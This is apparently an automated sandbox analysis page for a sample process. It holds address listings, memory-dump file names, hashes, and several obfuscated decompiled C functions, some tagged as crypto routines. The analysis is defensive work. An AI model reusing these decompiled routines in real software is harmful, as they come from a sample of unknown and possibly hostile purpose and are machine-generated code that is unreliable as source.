0x002a24e7
0x002a24e7
0x002a24ea
0x002a24ea
0x002a24ee
0x002a24ee
0x002a24f8
0x002a24fa
0x002a2502
0x002a2509
0x002a250f
0x002a250f
0x002a2510
0x002a251a
0x002a251c
0x002a2524
0x002a252b
0x002a2531
0x002a2531
0x002a253c
0x002a253e
0x002a2546
0x002a2549
0x002a254d
0x002a2550
0x002a2556
0x002a255d
0x002a2563
0x002a2566
0x002a2566
0x002a2567
0x002a2571
0x002a257a
0x002a2584
0x002a2584
0x002a258f
0x002a2593
0x002a259b
0x002a259b
0x002a259f
0x002a25ab
0x002a25b2
0x002a25b8
0x002a25b8
0x002a25bc
0x002a25c2
0x002a25ca
0x002a25cd
0x002a25d0
0x002a25da
0x002a25da
0x002a25e5
0x002a25e9
0x002a25f1
0x002a25f1
0x002a25f4
0x002a25fa
0x002a2602
0x002a2609
0x002a2612
0x002a2612
0x002a2613
0x002a261d
0x002a2620
0x002a2624
0x002a2627
0x002a2633
0x002a263a
0x002a2640
0x002a2641
0x002a2641
0x002a2642
0x002a264c
0x002a264f
0x002a2652
0x002a265c
0x002a2666
0x002a2666
0x002a2669
0x002a2670
0x002a2674
0x002a2678
0x002a267b
0x002a2681
0x002a2689
0x002a2690
0x002a2696
0x002a2699
0x002a2699
0x002a269d
0x002a26a0
0x002a26ac
0x002a26b0
0x002a26b3
0x002a26b4
0x002a26b4
0x002a26ba
0x002a26f3
0x002a26f7
0x002a26f8
0x002a26fb
0x002a26bc
0x002a26bc
0x002a26c3
0x002a26c6
0x002a26d9
0x002a26da
0x002a26e2
0x002a26e6
0x002a26e9
0x002a26ec
0x002a26ec
0x002a2705
0x002a270b
0x002a2711
0x002a2715
0x002a2716
0x002a2724
0x002a2728
0x002a272b
0x002a272e
0x002a2734
0x002a2737
0x002a2744
0x002a2746
0x002a2747
0x002a274f
0x002a2752
0x002a2754
0x002a2757
0x002a2759
0x002a2760
0x002a2761
0x002a2763
0x002a2766
0x002a2778
0x002a277a
0x002a277e
0x002a23f3
0x00000000
0x00000000
0x002a2400
0x002a2402
0x002a2408
0x002a240f
0x002a2415
0x002a2415
0x002a2418
0x002a2424
0x002a2426
0x002a2430
0x002a2434
0x002a243a
0x002a243e
0x002a2440
0x002a2444
0x002a2449
0x002a244f
0x002a2453
0x002a2455
0x002a245b
0x002a245b
0x002a245e
0x002a246a
0x002a2471
0x002a2477
0x002a2477
0x002a24ea
0x002a24ee
0x002a24ee
0x002a24f8
0x002a24fa
0x002a2502
0x002a2509
0x002a250f
0x002a250f
0x002a2510
0x002a251a
0x002a251c
0x002a2524
0x002a252b
0x002a2531
0x002a2531
0x002a253c
0x002a253e
0x002a2546
0x002a2549
0x002a254d
0x002a2550
0x002a2556
0x002a255d
0x002a2563
0x002a2566
0x002a2566
0x002a2567
0x002a2571
0x002a257a
0x002a2584
0x002a2584
0x002a258f
0x002a2593
0x002a259b
0x002a259b
0x002a259f
0x002a25ab
0x002a25b2
0x002a25b8
0x002a25b8
0x002a25bc
0x002a25c2
0x002a25ca
0x002a25cd
0x002a25d0
0x002a25da
0x002a25da
0x002a25e5
0x002a25e9
0x002a25f1
0x002a25f1
0x002a25f4
0x002a25fa
0x002a2602
0x002a2609
0x002a2612
0x002a2612
0x002a2613
0x002a261d
0x002a2620
0x002a2624
0x002a2627
0x002a2633
0x002a263a
0x002a2640
0x002a2641
0x002a2641
0x002a2642
0x002a264c
0x002a264f
0x002a2652
0x002a265c
0x002a2666
0x002a2666
0x002a2669
0x002a2670
0x002a2674
0x002a2678
0x002a267b
0x002a2681
0x002a2689
0x002a2690
0x002a2696
0x002a2699
0x002a2699
0x002a269d
0x002a26a0
0x002a26ac
0x002a26b0
0x002a26b3
0x00000000
0x002a278e
0x002a278e
0x002a2799
0x002a2799
0x002a277e
0x002a24ea

Memory Dump Source

Source File: 00000006.00000002.2504141033.00000000002A0000.00000040.00000001.sdmp, Offset: 002A0000, based on PE: true

Associated: 00000006.00000002.2504161357.00000000002B8000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2504170151.00000000002FD000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5063cc60d0f54240b9a3c44f49a1b41b478f4e192b9dbd546f22f91da9e65e9d
Instruction ID: c6c13cd61e67d50d98fb261db4f122fe357a51b8404b1b45e5d0da6db66441c2
Opcode Fuzzy Hash: 5063cc60d0f54240b9a3c44f49a1b41b478f4e192b9dbd546f22f91da9e65e9d
Instruction Fuzzy Hash: FEB18A32800215DFEB14DF64C8897AEBBF5FF88725F19886DDC889B145DB781860CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 002A6424, Relevance: .2, Instructions: 241
COMMONCrypto

Download Yara Rule

C-Code - Quality: 91%

			E002A6424(signed int __ebx, signed int __ecx, signed int __edi, signed int __esi, signed int _a4, signed int _a8, signed int _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v20;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _t116;
				signed int _t118;
				signed int _t119;
				signed int _t123;
				signed int _t125;
				signed int _t126;
				signed int _t129;
				signed int _t132;
				void* _t133;
				signed int _t136;
				intOrPtr _t139;
				signed int _t140;
				signed int _t141;
				signed int _t142;
				signed int _t143;
				void* _t146;
				signed int _t147;
				void* _t150;
				signed int _t152;
				signed int _t153;
				signed int _t159;
				signed int _t162;
				signed int _t174;
				signed int _t180;
				signed int _t183;
				void* _t188;
				signed int* _t194;
				signed int _t197;
				void* _t200;
				signed int* _t207;
				signed int* _t208;
				signed int* _t210;

				_t183 = __esi;
				_t167 = __edi;
				_t147 = __ecx;
				_t143 = __ebx;
				_t194 = _t207;
				_t208 =  &(_t207[0xfffffffffffffffe]);
				if( *(__ebx + 0x41863f) == 0) {
					_push(__edi);
					_t2 = _t143 + 0x418267; // 0x100
					 *_t208 =  *_t2;
					_push(__ecx);
					_push( *_t208);
					_t4 = _t143 + 0x4180fb; // 0x2030408
					_v20 =  *_t4;
					_pop(_t180);
					_push(_v12);
					 *_t208 = _t208;
					_t142 =  *((intOrPtr*)(__ebx + 0x45d03c))();
					_v8 = _t180;
					 *(__ebx + 0x41863f) =  *(__ebx + 0x41863f) & 0x00000000;
					 *(__ebx + 0x41863f) =  *(__ebx + 0x41863f) | _t180 ^ _v8 | _t142;
					_t167 = _v8;
				}
				 *_t208 =  *_t208 & 0x00000000;
				 *_t208 =  *_t208 ^ _t183;
				_t15 = _t143 + 0x418344; // 0x418344
				_v8 = _v8 & 0x00000000;
				_v20 = _v20 + _t15;
				_t116 =  *((intOrPtr*)(_t143 + 0x45d018))(_v8, _t147);
				 *(_t143 + 0x4182b7) =  *(_t143 + 0x4182b7) & 0x00000000;
				 *(_t143 + 0x4182b7) =  *(_t143 + 0x4182b7) | _t159 & 0x00000000 | _t116;
				_t162 = _t159;
				_t118 = _t116 & 0x00000000 ^ (_t143 & 0x00000000 | _a4);
				_t146 = _t143;
				if( *(_t146 + 0x4183ac) == 0) {
					 *_t208 =  *_t208 - _t146;
					 *_t208 = _t118;
					_t26 = _t146 + 0x4184c7; // 0x100
					_v28 =  *_t26;
					_t174 = _t167;
					_t28 = _t146 + 0x418464; // 0x0
					_v32 =  *_t28;
					_t162 = _t162;
					_t30 = _t146 + 0x4180db; // 0x700
					_v36 =  *_t30;
					_t194 = _t194;
					_t141 =  *((intOrPtr*)(_t146 + 0x45d040))(_t183, _t162, _t146);
					 *_t208 = _t174;
					 *(_t146 + 0x4183ac) = 0 ^ _t141;
					_t167 = 0;
					_t118 = _t183;
				}
				_t119 = _t118 - 1;
				if( *(_t146 + 0x4180ef) == 0) {
					_v8 = 0;
					 *_t208 =  *_t208 ^ _t119;
					_t140 =  *((intOrPtr*)(_t146 + 0x45d01c))(_v8);
					_v12 = _t167;
					 *(_t146 + 0x4180ef) =  *(_t146 + 0x4180ef) & 0x00000000;
					 *(_t146 + 0x4180ef) =  *(_t146 + 0x4180ef) ^ (_t167 & 0x00000000 | _t140);
					_t167 = _v12;
					_pop(_t119);
				}
				if(_t119 > 0) {
					if(_a12 != 0) {
						if( *(_t146 + 0x418324) == 0) {
							_v12 = _v12 & 0x00000000;
							 *_t208 =  *_t208 | _t119;
							_t86 = _t146 + 0x41861b; // 0x800
							_v28 =  *_t86;
							_t197 = _t194;
							_t88 = _t146 + 0x4185bf; // 0x200
							_t147 = _v32;
							_v32 =  *_t88;
							_t90 = _t146 + 0x4185c3; // 0x800
							_v36 =  *_t90;
							_t129 =  *((intOrPtr*)(_t146 + 0x45d040))(_t147, _t194, _v12);
							 *(_t146 + 0x418324) =  *(_t146 + 0x418324) & 0x00000000;
							 *(_t146 + 0x418324) =  *(_t146 + 0x418324) | _t197 & 0x00000000 | _t129;
							_t194 = _t197;
							_t119 = _t119;
						}
						_t123 = _t119;
						 *_t208 = _t123;
						_v28 = _v28 & 0x00000000;
						_v28 = _v28 ^ (_t147 & 0x00000000 | _t119 -  *_t208 | _a12);
						_t99 = _t146 + 0x41821f; // 0x8302c6
						_v8 = 0;
						_v32 = _v32 | _t99;
						_t125 =  *((intOrPtr*)(_t146 + 0x45d018))(_v8, _v12);
						_v12 = _t167;
						 *(_t146 + 0x41845c) =  *(_t146 + 0x41845c) & 0x00000000;
						 *(_t146 + 0x41845c) =  *(_t146 + 0x41845c) | _t167 ^ _v12 ^ _t125;
						_pop(_t150);
						_t126 = _t194;
						_v28 = _v28 ^ _t150 + _t126;
						_t152 = _t146;
						_t153 = _t152 & _a8;
						_t183 = _t183 + _t153;
						_v28 = _v28 - _t146;
						_v28 = _t183;
						_v32 = _t153;
						_v12 = _v12 & 0x00000000;
						_v36 = _v36 | _t126;
						_t119 = E002A6424(_t146, _t153, _v12, _t183, _v12, _v8, _t146);
					}
					_push(_t183);
					return _t119 ^ _t119;
				} else {
					if( *((intOrPtr*)(_t146 + 0x41805b)) == 0) {
						 *_t208 =  *_t208 - _t194;
						 *_t208 =  *_t208 ^ _t119;
						_v12 = _v12 & 0x00000000;
						_v28 = _v28 | _t119;
						_t48 = _t146 + 0x4183d0; // 0x8020101
						_v32 =  *_t48;
						_t50 = _t146 + 0x4182cb; // 0x800
						_v36 =  *_t50;
						_v8 = _v8 & 0x00000000;
						 *_t208 =  *_t208 | _v36;
						_t139 =  *((intOrPtr*)(_t146 + 0x45d044))(_v8, _t183, _t119, _v12, _t194);
						 *_t208 = _t147;
						 *((intOrPtr*)(_t146 + 0x41805b)) = _t139;
						_t147 = 0;
						_pop(_t119);
					}
					_pop(_t188);
					if( *(_t146 + 0x41822b) == 0) {
						_v20 = _v20 - _t147;
						_v20 = _v20 ^ _t119;
						_t58 = _t146 + 0x418647; // 0x400
						_v28 =  *_t58;
						_t60 = _t146 + 0x4183e0; // 0x8020304
						_t162 = _v32;
						_v32 =  *_t60;
						_t62 = _t146 + 0x418307; // 0x300
						_v36 =  *_t62;
						_t64 = _t146 + 0x41842c; // 0x5
						 *_t208 =  *_t64;
						_t136 =  *((intOrPtr*)(_t146 + 0x45d048))(_t188, _t147, _t162, _t119, _t147, 0, _t147);
						 *_t208 = _t194;
						 *(_t146 + 0x41822b) = 0 ^ _t136;
						_t194 = 0;
						_t119 = _t147;
					}
					_t210 = _t194;
					_pop(_t200);
					if( *(_t146 + 0x418552) == 0) {
						 *_t210 =  *_t210 & 0x00000000;
						 *_t210 =  *_t210 + _t119;
						_t69 = _t146 + 0x4181fb; // 0x0
						_v20 =  *_t69;
						_v12 = _v12 & 0x00000000;
						 *_t210 = _t210 +  *_t210;
						_t74 = _t146 + 0x418643; // 0x500
						_v28 =  *_t74;
						_t132 =  *((intOrPtr*)(_t146 + 0x45d03c))(_t162, _t162, _v12, _t119, _t162);
						 *(_t146 + 0x418552) =  *(_t146 + 0x418552) & 0x00000000;
						 *(_t146 + 0x418552) =  *(_t146 + 0x418552) | _t200 - _v32 ^ _t132;
						_t133 = _t200;
						return _t133;
					}
					return _t119;
				}
			}

0x002a6424
0x002a6424
0x002a6424
0x002a6424
0x002a6425
0x002a6427
0x002a6431
0x002a6433
0x002a6434
0x002a643a
0x002a643d
0x002a643e
0x002a643f
0x002a6445
0x002a6449
0x002a644a
0x002a644d
0x002a6450
0x002a6456
0x002a645e
0x002a6465
0x002a646b
0x002a646b
0x002a646f
0x002a6473
0x002a6476
0x002a647c
0x002a6483
0x002a6486
0x002a6492
0x002a6499
0x002a649f
0x002a64aa
0x002a64ac
0x002a64b4
0x002a64b7
0x002a64ba
0x002a64bf
0x002a64c5
0x002a64c9
0x002a64cc
0x002a64d2
0x002a64d6
0x002a64d9
0x002a64df
0x002a64e3
0x002a64e4
0x002a64ec
0x002a64f3
0x002a64f9
0x002a64fa
0x002a64fa
0x002a64fb
0x002a6503
0x002a6505
0x002a650f
0x002a6512
0x002a6518
0x002a6520
0x002a6527
0x002a652d
0x002a6530
0x002a6530
0x002a6534
0x002a667d
0x002a668a
0x002a668c
0x002a6693
0x002a6698
0x002a669e
0x002a66a2
0x002a66a4
0x002a66aa
0x002a66aa
0x002a66ae
0x002a66b4
0x002a66b7
0x002a66c3
0x002a66ca
0x002a66d0
0x002a66d1
0x002a66d1
0x002a66de
0x002a66e2
0x002a66e6
0x002a66ea
0x002a66ed
0x002a66f3
0x002a66fd
0x002a6700
0x002a6706
0x002a670e
0x002a6715
0x002a671e
0x002a671f
0x002a6723
0x002a6726
0x002a6727
0x002a672a
0x002a672d
0x002a6730
0x002a6736
0x002a6739
0x002a6740
0x002a6743
0x002a6743
0x002a6748
0x002a6752
0x002a653a
0x002a6541
0x002a6544
0x002a6547
0x002a654a
0x002a6551
0x002a6555
0x002a655b
0x002a655f
0x002a6565
0x002a6568
0x002a656f
0x002a6572
0x002a657a
0x002a6581
0x002a6587
0x002a6588
0x002a6588
0x002a6589
0x002a6591
0x002a6594
0x002a6597
0x002a659e
0x002a65a4
0x002a65aa
0x002a65b0
0x002a65b0
0x002a65b5
0x002a65bb
0x002a65c1
0x002a65c7
0x002a65ca
0x002a65d2
0x002a65d9
0x002a65df
0x002a65e0
0x002a65e0
0x002a65e1
0x002a65e1
0x002a65e9
0x002a65ec
0x002a65f0
0x002a65f4
0x002a65fa
0x002a65fd
0x002a6604
0x002a6609
0x002a660f
0x002a6614
0x002a6620
0x002a6627
0x002a662e
0x00000000
0x002a662e
0x002a662f
0x002a662f

Memory Dump Source

Source File: 00000006.00000002.2504141033.00000000002A0000.00000040.00000001.sdmp, Offset: 002A0000, based on PE: true

Associated: 00000006.00000002.2504161357.00000000002B8000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2504170151.00000000002FD000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c01750e277775b5bb73c90b0c73626882d4b9bebcb91e2c5f617f45b9fff920e
Instruction ID: 2401df4f9e7c9053bfdeef80be04649650197f33d6f7e1060e1fb1403bb518f7
Opcode Fuzzy Hash: c01750e277775b5bb73c90b0c73626882d4b9bebcb91e2c5f617f45b9fff920e
Instruction Fuzzy Hash: DCA18E72814608EFEB049F60C8897AEBBF4FF84725F1944ADEC88DA145DB7415A0CF69

Uniqueness

Uniqueness Score: -1.00%

Function 002A5AF6, Relevance: .2, Instructions: 156COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2504141033.00000000002A0000.00000040.00000001.sdmp, Offset: 002A0000, based on PE: true

Associated: 00000006.00000002.2504161357.00000000002B8000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2504170151.00000000002FD000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 127c99f67a807fc3ec6899e3212679090504ea9fb9ca94da451e6946324d0a6f
Instruction ID: 6982e65b29944cc770ee9877d64bf81d113eb7a130a447bab78663d83773eb1e
Opcode Fuzzy Hash: 127c99f67a807fc3ec6899e3212679090504ea9fb9ca94da451e6946324d0a6f
Instruction Fuzzy Hash: A251A332D18614AFEB088FA5D9467AEF7F6EF84320F25C16ED451A7280DB782950CB54

Uniqueness

Uniqueness Score: -1.00%

Function 002A2DF5, Relevance: .1, Instructions: 118COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2504141033.00000000002A0000.00000040.00000001.sdmp, Offset: 002A0000, based on PE: true

Associated: 00000006.00000002.2504161357.00000000002B8000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2504170151.00000000002FD000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8d33636ff269e6ce86d80894bdaab384b6ce7b48788419a0a639502d2374b5c3
Instruction ID: c472844b0140defdda3742bb9154fce12e279990993c5eec5043a9cd7bfc787b
Opcode Fuzzy Hash: 8d33636ff269e6ce86d80894bdaab384b6ce7b48788419a0a639502d2374b5c3
Instruction Fuzzy Hash: 01418E37A14604DFEB00CF65DA8179DBBF1EBC4324F26847EC984D7241DA34A9568B64

Uniqueness

Uniqueness Score: -1.00%

Function 002A1374, Relevance: .1, Instructions: 108COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2504141033.00000000002A0000.00000040.00000001.sdmp, Offset: 002A0000, based on PE: true

Associated: 00000006.00000002.2504161357.00000000002B8000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2504170151.00000000002FD000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0d8277b9f4298a1d3ba12900e7dac8ef4768870520da76c67005417d05339980
Instruction ID: 46cf15ba158013eb0f3a7267809335ef80d28cabcb01768fe457895bf3d2defe
Opcode Fuzzy Hash: 0d8277b9f4298a1d3ba12900e7dac8ef4768870520da76c67005417d05339980
Instruction Fuzzy Hash: D641B372820A05EBEB008F78CD493CA3B70EF41334F2587A8AD349E1D9CB7987659754

Uniqueness

Uniqueness Score: -1.00%

Function 002A596E, Relevance: .1, Instructions: 107COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2504141033.00000000002A0000.00000040.00000001.sdmp, Offset: 002A0000, based on PE: true

Associated: 00000006.00000002.2504161357.00000000002B8000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2504170151.00000000002FD000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b2686556099046eddf08c3e6d6d73a2f327f139f3c1b56c2a6beaa80eb6dc5f8
Instruction ID: d94c2f3ffcaf83a2d005f24b295106df4cecf5024d3011bcb223f084cf53f019
Opcode Fuzzy Hash: b2686556099046eddf08c3e6d6d73a2f327f139f3c1b56c2a6beaa80eb6dc5f8
Instruction Fuzzy Hash: 3A417C72420609ABEB048F25C88579A3B61FF45330F29C35EFC298E1D6CB7585659F54

Uniqueness

Uniqueness Score: -1.00%

Function 002A3314, Relevance: .1, Instructions: 99COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2504141033.00000000002A0000.00000040.00000001.sdmp, Offset: 002A0000, based on PE: true

Associated: 00000006.00000002.2504161357.00000000002B8000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2504170151.00000000002FD000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 560ed1783c81a9ed7e2fd1c32492ace24397eb239feb1bafd55e9357a7928519
Instruction ID: bd51e7643ae7eeb5d4c067df6b49b92e54d12ecc39a3c6c3faef55ef93cd5259
Opcode Fuzzy Hash: 560ed1783c81a9ed7e2fd1c32492ace24397eb239feb1bafd55e9357a7928519
Instruction Fuzzy Hash: A7413C72814A04EFEB05CF64C4853DA3B71FF40325F24C2AAEC695E1D5CB7493609B94

Uniqueness

Uniqueness Score: -1.00%

Function 002A3BDB, Relevance: .1, Instructions: 95COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2504141033.00000000002A0000.00000040.00000001.sdmp, Offset: 002A0000, based on PE: true

Associated: 00000006.00000002.2504161357.00000000002B8000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2504170151.00000000002FD000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1e90d8667cab6de1a58197d63df3259f80122070f0e9bf2772476be76fb66c74
Instruction ID: 9e29e3f1002958786e62c8f823335cbc49ac06c1aaf96f2db639f7919d6439b7
Opcode Fuzzy Hash: 1e90d8667cab6de1a58197d63df3259f80122070f0e9bf2772476be76fb66c74
Instruction Fuzzy Hash: DC416872D11A08ABEB44CE68CAD53DE7B70EF44724F18839EDC39991D5CB7A42508B94

Uniqueness

Uniqueness Score: -1.00%

Function 002A5C76, Relevance: .1, Instructions: 90COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2504141033.00000000002A0000.00000040.00000001.sdmp, Offset: 002A0000, based on PE: true

Associated: 00000006.00000002.2504161357.00000000002B8000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2504170151.00000000002FD000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3039bc8be17ad7a7f37636f619efc7371f9b844a2f75de60832d8cc2cecd4126
Instruction ID: e579199f81e857b5a9404c7d137d40ad1d8870bf41d11c20cd54f3627e2ddafd
Opcode Fuzzy Hash: 3039bc8be17ad7a7f37636f619efc7371f9b844a2f75de60832d8cc2cecd4126
Instruction Fuzzy Hash: 04316D72C20A19ABEB448E79C9493DE7B30EF41330F14C369AC759A1D5DB7886618F94

Uniqueness

Uniqueness Score: -1.00%

Function 002A28EB, Relevance: .1, Instructions: 88COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2504141033.00000000002A0000.00000040.00000001.sdmp, Offset: 002A0000, based on PE: true

Associated: 00000006.00000002.2504161357.00000000002B8000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2504170151.00000000002FD000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4a5718ba127ba0e3b4e4f799766b4dfa8c1611d40f6bbcbcbe4f2376022bf96d
Instruction ID: 8d94db087fdccfe0103f01ba544162a55638bcb3e49bde59ae7a09a6db2835cc
Opcode Fuzzy Hash: 4a5718ba127ba0e3b4e4f799766b4dfa8c1611d40f6bbcbcbe4f2376022bf96d
Instruction Fuzzy Hash: A9317C72910A08DBEB04CFA8C9453DE7771FF40730F2883AADC259A1D5C73A8B619B84

Uniqueness

Uniqueness Score: -1.00%

Function 002A554B, Relevance: .1, Instructions: 86COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2504141033.00000000002A0000.00000040.00000001.sdmp, Offset: 002A0000, based on PE: true

Associated: 00000006.00000002.2504161357.00000000002B8000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2504170151.00000000002FD000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cda6221f67bc0ccc938790f31a1c3d06f4870972bf281b6cccfc970e4eb09e96
Instruction ID: f8872e3c335f37653b6f0df8a0792cb7338dadbbe8987a3ee8816a5bade5b84f
Opcode Fuzzy Hash: cda6221f67bc0ccc938790f31a1c3d06f4870972bf281b6cccfc970e4eb09e96
Instruction Fuzzy Hash: 5031C832C10A05AFEB148F35C9893DB3761EF85370F1483ADAC298D1D6DBB446629B50

Uniqueness

Uniqueness Score: -1.00%

Function 002A52EC, Relevance: .1, Instructions: 85COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2504141033.00000000002A0000.00000040.00000001.sdmp, Offset: 002A0000, based on PE: true

Associated: 00000006.00000002.2504161357.00000000002B8000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2504170151.00000000002FD000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6772d07bb20010ae8d900fdf4e033f0ac93e4af5e53587df6f6718c8f3faec43
Instruction ID: 744f2a1e65b384dfc0c27bcb8b11baec593d05da2cfe31b55db1a3e0b2a7b6d4
Opcode Fuzzy Hash: 6772d07bb20010ae8d900fdf4e033f0ac93e4af5e53587df6f6718c8f3faec43
Instruction Fuzzy Hash: 8C311C72C20604AFFB048E35CA497DA3760EF51336F28C3ADAC389D1D5CB794661AB58

Uniqueness

Uniqueness Score: -1.00%

Function 10002154, Relevance: .1, Instructions: 77
COMMONCrypto

Download Yara Rule

C-Code - Quality: 71%

			E10002154(signed int* __eax, void* __ebx, signed int __edx, char _a4, long _a8, intOrPtr _a12) {
				intOrPtr _v8;
				char _v12;
				void* __ebp;
				signed int* _t43;
				char _t44;
				void* _t46;
				void* _t49;
				intOrPtr* _t53;
				void* _t54;
				void* _t65;
				long _t66;
				signed int* _t80;
				signed int* _t82;
				void* _t84;
				signed int _t86;
				void* _t89;
				void* _t95;
				void* _t96;
				void* _t99;
				void* _t106;

				_t43 = _t84;
				_t65 = __ebx + 2;
				 *_t43 =  *_t43 ^ __edx ^  *__eax;
				_t89 = _t95;
				_t96 = _t95 - 8;
				_push(_t65);
				_push(_t84);
				_push(_t89);
				asm("cld");
				_t66 = _a8;
				_t44 = _a4;
				if(( *(_t44 + 4) & 0x00000006) != 0) {
					_push(_t89);
					E100022BB(_t66 + 0x10, _t66, 0xffffffff);
					_t46 = 1;
				} else {
					_v12 = _t44;
					_v8 = _a12;
					 *((intOrPtr*)(_t66 - 4)) =  &_v12;
					_t86 =  *(_t66 + 0xc);
					_t80 =  *(_t66 + 8);
					_t49 = E10002375(_t66);
					_t99 = _t96 + 4;
					if(_t49 == 0) {
						 *(_a4 + 4) =  *(_a4 + 4) | 0x00000008;
						goto L11;
					} else {
						while(_t86 != 0xffffffff) {
							_t53 =  *((intOrPtr*)(_t80 + 4 + (_t86 + _t86 * 2) * 4));
							if(_t53 == 0) {
								L8:
								_t80 =  *(_t66 + 8);
								_t86 = _t80[_t86 + _t86 * 2];
								continue;
							} else {
								_t54 =  *_t53();
								_t89 = _t89;
								_t86 = _t86;
								_t66 = _a8;
								_t55 = _t54;
								_t106 = _t54;
								if(_t106 == 0) {
									goto L8;
								} else {
									if(_t106 < 0) {
										_t46 = 0;
									} else {
										_t82 =  *(_t66 + 8);
										E10002260(_t55, _t66);
										_t89 = _t66 + 0x10;
										E100022BB(_t89, _t66, 0);
										_t99 = _t99 + 0xc;
										E10002357(_t82[2]);
										 *(_t66 + 0xc) =  *_t82;
										_t66 = 0;
										_t86 = 0;
										 *(_t82[2])(1);
										goto L8;
									}
								}
							}
							goto L13;
						}
						L11:
						_t46 = 1;
					}
				}
				L13:
				return _t46;
			}

0x10002158
0x10002159
0x1000215a
0x1000215d
0x1000215f
0x10002162
0x10002163
0x10002165
0x10002166
0x10002167
0x1000216a
0x10002174
0x10002225
0x1000222c
0x10002235
0x1000217a
0x1000217a
0x10002180
0x10002186
0x10002189
0x1000218c
0x10002190
0x10002195
0x1000219a
0x1000221a
0x00000000
0x1000219c
0x1000219c
0x100021a8
0x100021aa
0x10002205
0x10002205
0x1000220b
0x00000000
0x100021ac
0x100021bb
0x100021bd
0x100021be
0x100021bf
0x100021c2
0x100021c2
0x100021c4
0x00000000
0x100021c6
0x100021c6
0x10002210
0x100021c8
0x100021c8
0x100021cc
0x100021d4
0x100021d9
0x100021de
0x100021ea
0x100021f2
0x100021f9
0x100021ff
0x10002203
0x00000000
0x10002203
0x100021c6
0x100021c4
0x00000000
0x100021aa
0x1000221e
0x1000221e
0x1000221e
0x1000219a
0x1000223a
0x10002241

Memory Dump Source

Source File: 00000006.00000002.2505264344.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.2505258135.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.2505270801.0000000010005000.00000040.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 12a7070065f657aa0aacf06b7ef6137888dfa06173cfdd6141a47a1bb7c7c469
Instruction ID: 9c57574405240a8165450f76d07df83800bb314007ae7cce2d6078ed4837daf0
Opcode Fuzzy Hash: 12a7070065f657aa0aacf06b7ef6137888dfa06173cfdd6141a47a1bb7c7c469
Instruction Fuzzy Hash: 6521CB76900204AFD710DFA8CCC09A7F7A5FF49390B468158DD599B249D730FA25CBE0

Uniqueness

Uniqueness Score: -1.00%

Function 001CB11C, Relevance: .1, Instructions: 77
COMMONCrypto

Download Yara Rule

C-Code - Quality: 71%

			E001CB11C(signed int* __eax, void* __ebx, signed int __edx, char _a4, long _a8, intOrPtr _a12) {
				intOrPtr _v8;
				char _v12;
				void* __ebp;
				signed int* _t43;
				char _t44;
				void* _t46;
				void* _t49;
				intOrPtr* _t53;
				void* _t54;
				void* _t65;
				long _t66;
				signed int* _t80;
				signed int* _t82;
				void* _t84;
				signed int _t86;
				void* _t89;
				void* _t95;
				void* _t96;
				void* _t99;
				void* _t106;

				_t43 = _t84;
				_t65 = __ebx + 2;
				 *_t43 =  *_t43 ^ __edx ^  *__eax;
				_t89 = _t95;
				_t96 = _t95 - 8;
				_push(_t65);
				_push(_t84);
				_push(_t89);
				asm("cld");
				_t66 = _a8;
				_t44 = _a4;
				if(( *(_t44 + 4) & 0x00000006) != 0) {
					_push(_t89);
					E001CB287(_t66 + 0x10, _t66, 0xffffffff);
					_t46 = 1;
				} else {
					_v12 = _t44;
					_v8 = _a12;
					 *((intOrPtr*)(_t66 - 4)) =  &_v12;
					_t86 =  *(_t66 + 0xc);
					_t80 =  *(_t66 + 8);
					_t49 = E001CB341(_t66);
					_t99 = _t96 + 4;
					if(_t49 == 0) {
						 *(_a4 + 4) =  *(_a4 + 4) | 0x00000008;
						goto L11;
					} else {
						while(_t86 != 0xffffffff) {
							_t53 =  *((intOrPtr*)(_t80 + 4 + (_t86 + _t86 * 2) * 4));
							if(_t53 == 0) {
								L8:
								_t80 =  *(_t66 + 8);
								_t86 = _t80[_t86 + _t86 * 2];
								continue;
							} else {
								_t54 =  *_t53();
								_t89 = _t89;
